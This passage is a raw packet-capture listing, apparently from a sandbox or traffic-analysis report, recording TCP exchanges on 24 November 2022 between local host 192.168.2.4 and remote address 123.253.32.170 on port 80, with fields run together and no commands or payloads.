                    Nov 24, 2022 20:13:10.338413954 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338450909 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338480949 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338512897 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338538885 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338555098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338598967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338602066 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338632107 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338660002 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338661909 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338685036 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338695049 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338718891 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338726044 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338754892 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338756084 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338773966 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338804960 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338829994 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338846922 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338859081 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338903904 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338921070 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338965893 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.338994026 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339006901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339019060 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339047909 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339062929 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339088917 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339102983 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339129925 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339145899 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339171886 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339185953 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339212894 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339234114 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339252949 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339267015 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339306116 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339313030 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339360952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339366913 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339415073 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339467049 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339483023 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339483023 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339508057 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339530945 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339550972 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339565992 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339596987 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339616060 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339651108 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339654922 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339689970 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339700937 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339745045 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339746952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339787960 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339798927 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339827061 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339840889 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339869976 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339883089 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339911938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339952946 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.339955091 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339976072 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.339993954 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340034962 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340044975 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340090990 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340096951 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340142965 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340162992 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340198040 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340218067 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340250969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340265989 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340292931 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.340312958 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.340384007 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.621828079 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623171091 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623229027 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623270988 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623315096 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623354912 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623397112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623406887 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623406887 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623461008 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623476028 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623509884 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623555899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623579025 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623620987 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623625994 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623667002 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623708010 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623749018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623774052 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623806000 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623809099 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.623857021 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623898983 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623944998 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.623960018 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624001026 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624006987 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624052048 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624094963 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624139071 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624187946 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624196053 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624212027 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624249935 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624295950 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624314070 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624347925 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624389887 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624434948 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624452114 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624488115 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624500990 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624538898 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624578953 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624645948 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624661922 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624711990 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624726057 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624763966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624806881 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624850988 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624881029 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624908924 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.624931097 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.624960899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625004053 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625049114 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625091076 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.625109911 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.625109911 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625158072 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625200033 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625243902 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625261068 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.625303984 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625368118 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625374079 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.625431061 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625489950 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625502110 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.625555992 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.625569105 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.678850889 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.906414032 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906483889 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906531096 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906596899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906668901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906673908 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.906733990 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906742096 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.906794071 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906819105 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.906856060 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.906944036 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907006979 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907046080 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907073021 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907088041 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907130957 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907197952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907248020 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907273054 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907309055 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907313108 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907381058 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907428980 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907474041 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907496929 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907533884 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907545090 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907596111 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907643080 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907686949 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907720089 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907752991 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907762051 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907809973 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907850981 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907901049 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907923937 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.907970905 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.907974958 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908018112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908062935 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908122063 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908137083 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908178091 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908190012 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908227921 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908272028 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908333063 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908344984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908389091 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908405066 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908437014 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908495903 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908540964 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908567905 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908596039 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908606052 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908653975 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908713102 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908761978 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908785105 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908816099 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908828020 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.908880949 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908932924 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.908974886 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909003973 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.909034967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909048080 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.909096003 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909137964 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909184933 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909207106 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.909250021 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.909256935 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.959656000 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.959718943 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.959867001 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.190613031 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190681934 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190725088 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190767050 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190788031 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.190809011 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190814972 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.190870047 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190933943 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.190977097 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191016912 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191059113 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191098928 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191132069 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191132069 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191132069 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191139936 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191181898 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191224098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191260099 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191266060 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191283941 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191308975 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191349983 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191392899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191399097 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191433907 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191438913 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191473961 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191514969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191555023 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191560984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191596031 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191606045 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191637993 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191680908 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191685915 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191720963 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191762924 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191802979 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191812038 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191844940 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191849947 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.191885948 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191929102 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191971064 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.191986084 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192011118 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192018986 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192054033 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192095041 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192133904 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192142963 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192173958 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192177057 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192214966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192255974 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192297935 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192306042 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192337036 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192342043 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192378044 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192419052 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192440033 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192460060 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192500114 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192543983 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192576885 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192621946 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192631960 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192668915 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192708969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192749977 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192759991 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192791939 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.192802906 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.192832947 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.193573952 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.240662098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.240725040 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.240768909 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.240900040 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.288271904 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.473635912 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473709106 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473757982 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473802090 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473845005 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473846912 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.473886967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473895073 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.473927975 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.473948002 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.473970890 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474013090 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474021912 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474055052 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474097967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474112988 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474139929 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474191904 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474257946 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474308014 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474350929 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474368095 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474394083 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474436998 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474457026 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474478006 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474520922 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474529982 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474561930 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474603891 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474610090 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474644899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474692106 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474699974 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474734068 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.474778891 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.474781036 CET8049701123.253.32.170192.168.2.4
